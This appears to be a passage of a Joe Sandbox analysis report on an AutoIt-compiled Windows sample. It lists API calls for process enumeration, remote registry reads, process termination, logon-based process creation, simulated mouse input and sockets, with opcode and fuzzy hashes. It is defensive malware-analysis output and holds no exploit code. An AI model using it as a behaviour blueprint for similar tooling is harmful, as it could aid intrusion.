                                                                • _wcscat.LIBCMT ref: 00341C69
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00341CDF
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00341CF1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                • String ID:
                                                                • API String ID: 1380811348-0
                                                                • Opcode ID: 4c0bd5a3587fadb3cfa22756658453c287f227917f10e8007ba5f9eeaf78fb72
                                                                • Instruction ID: 4f00a3985fe08511ab146c5c1f169f9a8ed154e0396fa2de64eee946bbacb193
                                                                • Opcode Fuzzy Hash: 4c0bd5a3587fadb3cfa22756658453c287f227917f10e8007ba5f9eeaf78fb72
                                                                • Instruction Fuzzy Hash: 6F51AEB15043409FD321EF24C885EABB7ECEF88754F40492EF5859B291DB70E914CB92
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003430AF
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003430EF
                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00343112
                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0034313B
                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0034317E
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0034318B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                • String ID:
                                                                • API String ID: 3451389628-0
                                                                • Opcode ID: bca05e857825db54f84d7094400b6ac3897b0b329bcc5e14266175026f44e8ef
                                                                • Instruction ID: 095f876df509ece94ab5cc6fb4439aff9dfc35a60fd100b44479ca0f7d84caab
                                                                • Opcode Fuzzy Hash: bca05e857825db54f84d7094400b6ac3897b0b329bcc5e14266175026f44e8ef
                                                                • Instruction Fuzzy Hash: 77516631218240AFC706EF64C885EAABBE9FF88304F04891DF5458B2A1DB71EA15CB52
                                                                APIs
                                                                • GetMenu.USER32(?), ref: 00348540
                                                                • GetMenuItemCount.USER32(00000000), ref: 00348577
                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0034859F
                                                                • GetMenuItemID.USER32(?,?), ref: 0034860E
                                                                • GetSubMenu.USER32(?,?), ref: 0034861C
                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0034866D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountMessagePostString
                                                                • String ID:
                                                                • API String ID: 650687236-0
                                                                • Opcode ID: 59a1b7c69a8abc8c3a7daa210d703edb05c90b6b33053548b19cf19dfa2d58c7
                                                                • Instruction ID: f07fcbbfe5fabbc5be56054c159d7bda16a7af83189f6690cc8a74aaae80fbce
                                                                • Opcode Fuzzy Hash: 59a1b7c69a8abc8c3a7daa210d703edb05c90b6b33053548b19cf19dfa2d58c7
                                                                • Instruction Fuzzy Hash: 7C519F31E00114EFCB12EF55C941AAEB7F8EF48710F1244A9EA15BB351CB74BE418B90
                                                                APIs
                                                                • _memset.LIBCMT ref: 00324B10
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324B5B
                                                                • IsMenu.USER32(00000000), ref: 00324B7B
                                                                • CreatePopupMenu.USER32 ref: 00324BAF
                                                                • GetMenuItemCount.USER32(000000FF), ref: 00324C0D
                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00324C3E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                • String ID:
                                                                • API String ID: 3311875123-0
                                                                APIs
                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0037DC00), ref: 00338E7C
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338E89
                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00338EAD
                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00338EC5
                                                                • _strlen.LIBCMT ref: 00338EF7
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338F6A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: ErrorLast$_strlenselect
                                                                • String ID:
                                                                • API String ID: 2217125717-0
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • BeginPaint.USER32(?,?,?), ref: 002FAC2A
                                                                • GetWindowRect.USER32(?,?), ref: 002FAC8E
                                                                • ScreenToClient.USER32(?,?), ref: 002FACAB
                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002FACBC
                                                                • EndPaint.USER32(?,?,?,?,?), ref: 002FAD06
                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0035E673
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                • String ID:
                                                                • API String ID: 2592858361-0
                                                                APIs
                                                                • ShowWindow.USER32(003A1628,00000000,003A1628,00000000,00000000,003A1628,?,0035DC5D,00000000,?,00000000,00000000,00000000,?,0035DAD1,00000004), ref: 0034E40B
                                                                • EnableWindow.USER32(00000000,00000000), ref: 0034E42F
                                                                • ShowWindow.USER32(003A1628,00000000), ref: 0034E48F
                                                                • ShowWindow.USER32(00000000,00000004), ref: 0034E4A1
                                                                • EnableWindow.USER32(00000000,00000001), ref: 0034E4C5
                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0034E4E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: Window$Show$Enable$MessageSend
                                                                • String ID:
                                                                • API String ID: 642888154-0
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 003298D1
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00329908
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00329924
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0032999E
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003299B3
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003299D2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 2537439066-0
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,003377F4,?,?,00000000,00000001), ref: 00339B53
                                                                  • Part of subcall function 00336544: GetWindowRect.USER32(?,?), ref: 00336557
                                                                • GetDesktopWindow.USER32 ref: 00339B7D
                                                                • GetWindowRect.USER32(00000000), ref: 00339B84
                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00339BB6
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                • GetCursorPos.USER32(?), ref: 00339BE2
                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00339C44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                • String ID:
                                                                • API String ID: 4137160315-0
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0031AFAE
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0031AFB5
                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0031AFC4
                                                                • CloseHandle.KERNEL32(00000004), ref: 0031AFCF
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0031AFFE
                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 0031B012
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                • String ID:
                                                                • API String ID: 1413079979-0
                                                                APIs
                                                                  • Part of subcall function 002FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                  • Part of subcall function 002FAF83: BeginPath.GDI32(?), ref: 002FB009
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0034EC20
                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0034EC34
                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0034EC42
                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0034EC52
                                                                • EndPath.GDI32(00000000), ref: 0034EC62
                                                                • StrokePath.GDI32(00000000), ref: 0034EC72
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                • String ID:
                                                                • API String ID: 43455801-0
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 0031E1C0
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0031E1D1
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0031E1D8
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0031E1E0
                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0031E1F7
                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0031E209
                                                                  • Part of subcall function 00319AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00319A05,00000000,00000000,?,00319DDB), ref: 0031A53A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                • String ID:
                                                                • API String ID: 603618608-0
                                                                APIs
                                                                • __init_pointers.LIBCMT ref: 00307B47
                                                                  • Part of subcall function 0030123A: __initp_misc_winsig.LIBCMT ref: 0030125E
                                                                  • Part of subcall function 0030123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00307F51
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00307F65
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00307F78
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00307F8B
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00307F9E
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00307FB1
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00307FC4
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00307FD7
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00307FEA
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00307FFD
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00308010
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00308023
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00308036
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00308049
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0030805C
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0030806F
                                                                • __mtinitlocks.LIBCMT ref: 00307B4C
                                                                  • Part of subcall function 00307E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0039AC68,00000FA0,?,?,00307B51,00305E77,00396C70,00000014), ref: 00307E41
                                                                • __mtterm.LIBCMT ref: 00307B55
                                                                  • Part of subcall function 00307BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00307B5A,00305E77,00396C70,00000014), ref: 00307D3F
                                                                  • Part of subcall function 00307BBD: _free.LIBCMT ref: 00307D46
                                                                  • Part of subcall function 00307BBD: DeleteCriticalSection.KERNEL32(0039AC68,?,?,00307B5A,00305E77,00396C70,00000014), ref: 00307D68
                                                                • __calloc_crt.LIBCMT ref: 00307B7A
                                                                • GetCurrentThreadId.KERNEL32 ref: 00307BA3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                • String ID:
                                                                • API String ID: 2942034483-0
                                                                • Opcode ID: 049d9ac75b6803e5c683b8d23e4d6916c2c67a7ad664e1bce4ad61ccea052962
                                                                • Instruction ID: 8aca5a091daad62df3e8cd3fde755e13a7e999e3b75fffd61efd8353d1098103
                                                                • Opcode Fuzzy Hash: 049d9ac75b6803e5c683b8d23e4d6916c2c67a7ad664e1bce4ad61ccea052962
                                                                • Instruction Fuzzy Hash: FCF09632E1F75219E6277734BC2B64A36C49F01770F214699F860CD1D2FF61B84281A0
                                                                APIs
                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002E281D
                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 002E2825
                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002E2830
                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002E283B
                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 002E2843
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 002E284B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Virtual
                                                                • String ID:
                                                                • API String ID: 4278518827-0
                                                                • Opcode ID: 315ae8985ea5337380e1b9e29f3ce636427e2659935051723864f1b3fa126db0
                                                                • Instruction ID: 6054fbf9922697eaa27802b1482b4c8a956f66e14e69abd50e852ddba3eb1fa7
                                                                • Opcode Fuzzy Hash: 315ae8985ea5337380e1b9e29f3ce636427e2659935051723864f1b3fa126db0
                                                                • Instruction Fuzzy Hash: 260167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 1423608774-0
                                                                • Opcode ID: e2d190e1c5dcffd8d463732f9253d01887b600e125b3f3b377ac02ffce0260f9
                                                                • Instruction ID: 90eed7a47fab4a4f93afcf1c22525d1b8df90a15157c9c52206c608a5d90efd0
                                                                • Opcode Fuzzy Hash: e2d190e1c5dcffd8d463732f9253d01887b600e125b3f3b377ac02ffce0260f9
                                                                • Instruction Fuzzy Hash: E701A436A02321ABD7175B55FC59EEF776DFF88701F05482AF503960A4DBB49810DB60
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00327C07
                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00327C1D
                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00327C2C
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C3B
                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C45
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C4C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 839392675-0
                                                                • Opcode ID: 725e6c29a5c478b337ea59736bf9313ac5567c60ae1ee6304a5eda14ae83794e
                                                                • Instruction ID: 48ca8b9c729b6aaf0489666c91d586642f5e582d1d5f9a9d9015681dddde166e
                                                                • Opcode Fuzzy Hash: 725e6c29a5c478b337ea59736bf9313ac5567c60ae1ee6304a5eda14ae83794e
                                                                • Instruction Fuzzy Hash: 1FF03A76A41168BBE7225B62EC0EEEF7B7CEFCAB11F004018FA01A1061D7E05A41C6B5
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00329A33
                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A44
                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A51
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A5E
                                                                  • Part of subcall function 003293D1: CloseHandle.KERNEL32(?,?,00329A6B,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 003293DB
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00329A71
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 3495660284-0
                                                                • Opcode ID: fe70984f2af7937de012e430f1642cabf3347071ed882ca82c0075d00e6f7651
                                                                • Instruction ID: 03a9b1cee441a11daed439949d5e20b1473eee1ce11273d04293bfdc1014c144
                                                                • Opcode Fuzzy Hash: fe70984f2af7937de012e430f1642cabf3347071ed882ca82c0075d00e6f7651
                                                                • Instruction Fuzzy Hash: EFF05E36A41211ABD7131BA4FC99EEE772DFF88701F154826F603950A0DBB59811DB60
                                                                APIs
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • __swprintf.LIBCMT ref: 002E1EA6
                                                                Strings
                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002E1D49
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                • API String ID: 2125237772-557222456
                                                                • Opcode ID: 301b7118097dd0501732ccad3b28f1f7d0b1882bcdaa3c2decdc47bfe5023360
                                                                • Instruction ID: 4b1bca6e9145ee5009b53eb46e235a844cdf559c67587bb938c9ae8d55bec23f
                                                                • Opcode Fuzzy Hash: 301b7118097dd0501732ccad3b28f1f7d0b1882bcdaa3c2decdc47bfe5023360
                                                                • Instruction Fuzzy Hash: 2191D1711643819FC715EF26C895C6EB7A8BF95700F84092DF885972A1EB70ED28CB92
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0033B006
                                                                • CharUpperBuffW.USER32(?,?), ref: 0033B115
                                                                • VariantClear.OLEAUT32(?), ref: 0033B298
                                                                  • Part of subcall function 00329DC5: VariantInit.OLEAUT32(00000000), ref: 00329E05
                                                                  • Part of subcall function 00329DC5: VariantCopy.OLEAUT32(?,?), ref: 00329E0E
                                                                  • Part of subcall function 00329DC5: VariantClear.OLEAUT32(?), ref: 00329E1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                • API String ID: 4237274167-1221869570
